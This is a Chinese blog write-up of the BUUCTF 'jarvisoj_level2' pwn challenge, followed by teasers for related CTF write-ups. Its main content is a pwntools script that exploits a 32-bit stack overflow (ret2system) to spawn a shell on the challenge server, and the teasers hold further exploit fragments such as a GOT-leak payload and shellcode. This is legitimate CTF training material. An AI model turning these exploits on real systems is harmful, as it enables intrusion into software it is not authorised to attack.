buuctf pwn jarvisoj_level21

kids-syc

于 2024-09-28 19:24:59 发布

阅读量315

点赞数 2

文章标签： linux 服务器计算机网络

本文链接：https://blog.youkuaiyun.com/m0_74125780/article/details/142620082

版权

首先用checksec检查一下，发现没有栈的保护，并且是32位的。

用ida32打开，有个vuln函数打开一看，存在栈溢出。

然后我们四处查找，发现有system和bin/sh，但是他们两个并不没有写在一起，所以我们先找到system的地址，再找到bin/sh的地址。

最后写代码

from pwn import *
p = remote('node5.buuoj.cn',27531)
system=0x8048320
binsh=0x804A024
p.sendline(b'a' * 140 + p32(system)+b'a'*4+p32(binsh))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kids-syc

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF Pwn jarvisoj_level21解题步骤

2301_81505831的博客

02-04

392

这里需要注意的是，由于我们是直接调用system()而不是使用call指令，因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址，因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件，RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88，ebp到Return的距离是0xF。system的地址可以在plt中找到，双击system.plt。然后在输入shift+F12，可以查找。

BUUCTF jarvisoj_level2 题解

qq_51802916的博客

08-20

578

可以看到程序中已经有了shell的字符串，由于是32位程序，函数的参数通过压栈传递，因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令，因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址，因此我们需要在这个地方随便填入一些值，然后在后面填入函数的第一个参数。，因此我们需要填充0x88个字符就能到达ebp的位置，然后再填充4个字符就能到达eip的位置，并且。可以看到是32位程序，栈上开启了不可执行保护，但是没有栈检测标志，推测需要进行缓冲区溢出。

参与评论您还未登录，请先登录后发表或查看评论

jarvisoj_level21解题

最新发布

2301_81504456的博客

02-04

625

没有调用先前指令system函数的情况下，在执行完函数后需要一个数据作为system的返回地址。

BUUCTF pwn

qq_40026795的博客

06-20

753

test_your_nc 丢进ida可以看到只有一个后门函数使用nc 网址端口连接反弹shell 或者使用pwntools连接 frompwnimport* p=remote('网址',端口) p.interactive() rip 一、载入ida 载入ida可以看到主要有两个函数，main()和fun() 使用f5产生类C代码 int__cdeclmain(inta...

Buuctf之pwn

qq_53809201的博客

05-07

761

1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +

BUUCTF jarvisoj_level0

m0_54262894的博客

10-27

390

先checksec，仅开启了NX保护运行一下放入ida中查看main函数没有什么关键信息，双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节，而我们可以输入更多的数据接着找找后门函数这道题很简单，已经把后门给我们展示出来了记住后门函数的地址0x400596 做完以上步骤我们就有思路了：覆盖buf 的80个字节因为是64位的文件，然后再加8个字节...

BUUCTF---jarvisoj_level4

qq_33010875的博客

09-26

368

环境：WSL2，ubuntu16.04，python2 checksec文件: 将文件拖入ida 溢出点：和level3不同的是 read函数之前没有调用write函数，因此要泄露libc的基地址需要用read函数，利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(

BUUCTF----jarvisoj_level3_x64

qq_33010875的博客

09-26

573

环境：WSL2，ubuntu16.04，python2 checksec文件：这道题level3的思路一样，只是32位的程序改成了64位。也就是说，在利用write函数泄露出libc的基地址时，需要用到寄存器来穿参数，write有三个参数，所以需要rdi，rsi，rdx三个寄存器，通过命令： ROPgadget --binary level3_x64 |grep "pop" 结果：从图中可以看到只找到了rdi和rsi寄存器，没有rdx寄存器尝试gdb程序：在read函数下断点，可以看到rd

buuctf（pwn）

个人笔记

04-04

3297

一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天（本还想从汇编直接分析，不过进展收获不大，欢迎有兴趣的朋友一起交流），下面还是从伪代码分析。通过这几行能看出最后A变成了B。即把YOU 换成了I。因为上面是S的溢出点是3C，可fgets之读取了32并不会超过3C，但函数会把一个32个I换成32个YOU就达到了溢出点。 3.

BUUCTF-PWN

weixin_52125240的博客

12-04

3023

BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示，来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat，其主要用途是建立和监听任意TCP和UDP连接，支持ipv4和ipv6。因此，它可以用来网络调试、端口扫描等等常用语法： nc [-hlnruz][-g<网关...>][-G<指向器数目&

”BUUCTF之pwn题解（一些栈题+程序分析）

热门推荐

swedsn

01-13

2万+

文章目录前言一、test_your_nc二、rip2.读入数据总结前言萌新的总结（包含当时做题的全过程)，方便以后查看。有什么不对的望各位大佬指点。一、test_your_nc 1.直接nc（nc+的ip+端口号）。这里是直接进入了对方的shell命令中（有些题目是直接进入对方的文件并不会进入对方的shell中）。接下来就是和操作自己的shell一样的，ls查看目录，cat查看文件flag。相互连接二、rip 1使用IDA打开文件，先找main函数，然后按F5查看伪代码。看wp说fun可疑，点进

buuctf pwn入门1

weixin_63231007的博客

07-07

1842

buuctf pwn 前几道简单栈溢出&格式化字符串漏洞

buuctf--pwn小结1test_your_nc

Xor0ne

06-14

2360

参考链接： 1、BUUCTF刷题（持续更新） 2、BUUCTF-PWN刷题日记 0x01 test_your_nc 参考链接：https://blog.youkuaiyun.com/qq_42404383/article/details/103625124 （1）、思路：看名字，然后直接用nc nc的全名是netcat，其主要用途是建立和监听任意TCP和UDP连接，支持ipv4和ipv6。因此，它可以用来网络调试、端口扫描等等。 nc [-hlnruz][-g<网关...>][-G<指向器数目&

buuctf中的一些pwn题总结（不断更新）

PLpa的博客

08-19

4759

前言：本文记录一些buuctf中不是很典型，但是仍然值得记录的pwn题，以便于查看。 0x00:stkof——unlink 查看保护查看IDA伪代码增自定义size，使用malloc分配。删 free之后直接置空，难以利用。改重点来到改中，这里可以随意输入大小，然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。解题思路由于此题存在堆溢出漏洞，我们又掌控着heap地址的存在位置，这样我们很容易就想到unlink漏洞来控制堆块。由于程序本身的原因，我们先malloc一个堆

[BUUCTF-pwn]——jarvisoj_level302-21

Y_peak的博客

02-21

247

[BUUCTF-pwn]——jarvisoj_level3 题目地址: https://buuoj.cn/challenges#jarvisoj_level3 以前好像写过这个题, 就不详细写了。有兴趣的可以去之前的博客翻一下, 就在BUU和OJ 里面大致思路, 泄露出一个地址, 找到对应的libc版本。计算偏移找到system和’/bin/sh’ exploit from pwn import * from LibcSearcher import * p = remote("node3.buuoj

buuctf——pwn刷题之旅（持续更新）

qq_42988973的博客

12-16

657

buuctf-pwn 的一些wp

BUUCTF-pwn(10)

njh18790816639的博客

01-08

414

picoctf_2018_shellcode 题目很很简单！ from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './PicoCTF_2018_shellcode' r = remote('node4.buuoj.cn',25585) #r = process(binary) elf = ELF(binary) shellcode = asm(shellcraft.sh()) r.recvunti

BUUCTF PWN（2）

qq_60794823的博客

09-28

330

首先先用checksec查看开启了什么保护可以看到只开启了NX保护，即堆栈不可执行用32位的IDA打开附件，shift+f12查看字串打开main函数查看vuln函数，发现存在栈溢出漏洞的函数，**fgets(s, 32, edata)**这里对gets作出了限制，32（0x20）而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗，结果肯定不是这样的仔细查看C代码可以发现，函数实现了字符串替换，将I替换为you，并将结果重组赋值给s。

jarvisoj_level1

08-28

- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...